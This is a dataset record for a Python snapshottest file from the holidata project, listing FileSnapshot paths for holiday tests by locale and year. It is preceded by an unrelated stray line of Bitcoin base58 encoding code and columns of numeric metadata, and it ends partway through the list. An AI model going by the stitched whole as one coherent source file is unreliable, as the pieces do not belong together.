    return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
| 39.754386
| 80
| 0.698147
| 210
| 2,266
| 7.533333
| 0.309524
| 0.027813
| 0.032238
| 0.051201
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0.804046
| 0
| 0.039576
| 0.208297
| 2,266
| 56
| 81
| 40.464286
| 0.842252
| 0.081642
| 0
| 0.837209
| 0
| 0
| 0.147358
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0.046512
| 0.069767
| 0
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0783499fad46e7e8daed65a881a1c7fa7eb1fce8
| 61,589
|
py
|
Python
|
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
tests/snapshots/snap_test_holidata.py
|
vice/holidata
|
24c6d168516ea15f19de3858dde7e15ccb2276c9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
from snapshottest.file import FileSnapshot
snapshots = Snapshot()
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2019] 1.py')
